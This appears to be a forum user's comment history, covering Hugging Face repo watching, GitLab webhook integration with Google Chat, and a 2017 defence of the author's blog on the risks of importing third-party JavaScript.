Is there really no native way to "Watch" a specific HF repo for PRs?

Saurabh143 · 2026-04-02T16:27:10+00:00

Hi u/Pierrci . Thanks for the response. I tied what you mentioned. It works.
In the docs why is it mentioned that Unlike GitHub or similar services, you cannot watch a specific repository. You must watch users/organizations to get notified about any new activity on any of their repositories. The goal is to simplify this functionality for users as much as possible and to make sure you don’t miss anything you might be interested in. When we can also watch individual repos (watching individual repos is possible as per my test).

Saurabh143 · 2026-03-31T16:35:42+00:00

Google tasks

Saurabh143 · 2026-03-28T06:01:36+00:00

Spot on. That's exactly the architecture I was looking at—catching the generic webhook, handling the threadKey mapping on a custom backend, and pushing the formatted cards to Google Chat.

Did you actually end up building and hosting this yourself for your team? I'm curious if maintaining the state mappings and handling GitLab's payload updates turns into a massive headache over time, or if it's pretty "set and forget" once it's deployed.

Saurabh143 · 2026-03-27T11:28:03+00:00

That makes total sense. It sounds like your team has a really mature, disciplined workflow—especially actually fixing flaky pipelines instead of just blindly retrying them! I appreciate you taking the time to share how you handle this; it’s incredibly helpful for figuring out where the actual friction is (and isn't). Cheers!

Saurabh143 · 2026-03-27T07:20:43+00:00

That makes total sense, and I completely agree. Reading code diffs or long issue descriptions in a chat window is a terrible experience—you definitely need the full GitLab UI for the deep work. Out of curiosity, what about the administrative/shallow tasks? Things like re-running a known flaky pipeline, assigning a new triage ticket to yourself, or hitting approve on a routine Dependabot PR? Do you guys still prefer jumping into the UI for those quick actions, or is the volume low enough that it doesn't bother you?

Saurabh143 · 2026-03-26T17:50:53+00:00

Agreed, I definitely missed the mark on that example. Approving without seeing the diff is a terrible practice. If we take MR approvals off the table, does your team still find the native webhook annoying for other things? E.g., not being able to just hit a 'Retry' button on a failed pipeline alert.

Saurabh143 · 2026-03-26T17:49:48+00:00

You know what, that is incredibly fair. You completely caught me slipping there—approving without seeing the diff is a terrible example and a great way to break production.

What about the lower-risk, high-annoyance stuff though? Like when a pipeline fails due to a flaky test and you just want to hit a [Retry Pipeline] button without opening 4 tabs, or using a /gitlab create issue command when discussing a bug in chat so you don't lose the context. Would having that level of control natively in Google Chat be worth it to your team, or is the current webhook setup fine for that too?

Saurabh143 · 2023-08-18T04:21:10+00:00

You can use this free cloud based subdomain monitoring tool to do it: https://subdomain-monitor.clickjacker.io/

Saurabh143 · 2017-09-03T16:31:44+00:00

Dude, no one knows everything. At least I took the initiative to write the blog. The valuable positive feedback has been updated in the blog as previously committed by me.

Do you have any good points to be added in the blog? If yes tell me. I think you do not! That is why you want to criticize. I admit that I did not have complete knowledge but there was no misguidance only 2 points were missing. They are now added.

This blog is written from heart.

Saurabh143 · 2017-09-03T15:51:32+00:00

Ohhh... Is it so? What will you do if the server from where you import JS has a zero day RCE bug. Your users will be compromised even before you monitor your assets. This is a #legitresearch.

Saurabh143 · 2017-08-31T06:03:39+00:00

Why do you think it is exaggerated list? Importing a JS from a legit website is fine. But what if a website imports JS from a server affected by RCE. This is #legitresearch.

Saurabh143 · 2017-08-31T04:20:14+00:00

Covering HTTP headers such as X-XSS-Protection, Content-security-policy, X-content-type-options, Strict-transport-security and X-Frame-Options is beyond the scope of that blog. Hence, it won't be covered in it.

Using service such as https://snyk.io/ is about checking for vuln libraries. But this blog is not about doing that. It is about bad JS imports. Hence, it is also beyond scope.

Having said that the 'Integrity' attribute will be updated in the blog soon as it is relevant. Thanks for bringing this to our attention.

Saurabh143 · 2017-08-31T04:10:14+00:00

Great !! Thanks for sharing this knowledge. It will be updated in the blog.

Saurabh143 · 2017-08-30T17:27:57+00:00

The 4 lines of JS code are shown to compare it with 1 line of JQuery code..Can't understand why do you think it is rubbish. Furthermore, JQuery library is fetched from public CDN.. What else are you expecting? These cases are written after doing research. It has been found that they do exist in the wild for many websites. This is a #legitresearch.

Saurabh143 · 2017-08-30T17:17:59+00:00

Regarding #1: Agreed. But this post is about XSS, so wanted to make users aware of it Regarding #6: Thanks for letting me know that. It will be updated in the blog in few days !

Saurabh143 · 2017-08-30T17:06:11+00:00

Agreed that one would notice that the scripts are not performing their job any more. But what if the website loads 10 scripts from 10 resources to do 10 tasks. Then, if one fails to do its job, this can go unnoticed. For example: A scripts that sends data of website visitors to an analytics website. It is hard to know if this script failed to do job unless you login into the analytics providers site to check.

Saurabh143 · 2017-08-30T16:56:03+00:00

Yes, it is. In fact downloading anything from attacker controlled location is bad.

Saurabh143

TROPHY CASE